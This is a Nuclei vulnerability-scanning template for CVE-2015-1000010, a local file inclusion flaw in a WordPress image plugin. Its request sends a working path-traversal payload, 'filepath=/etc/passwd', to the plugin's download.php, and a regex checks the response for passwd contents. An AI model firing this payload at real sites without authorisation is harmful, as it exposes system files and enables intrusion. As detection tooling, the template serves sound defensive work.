nuclei-templates/cves/2015/CVE-2015-1000010.yaml

37 lines
1.2 KiB
YAML

id: CVE-2015-1000010
info:
name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: |
WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
reference:
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
- https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
- http://www.vapidlabs.com/advisory.php?v=147
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1000010
cwe-id: CWE-22
tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29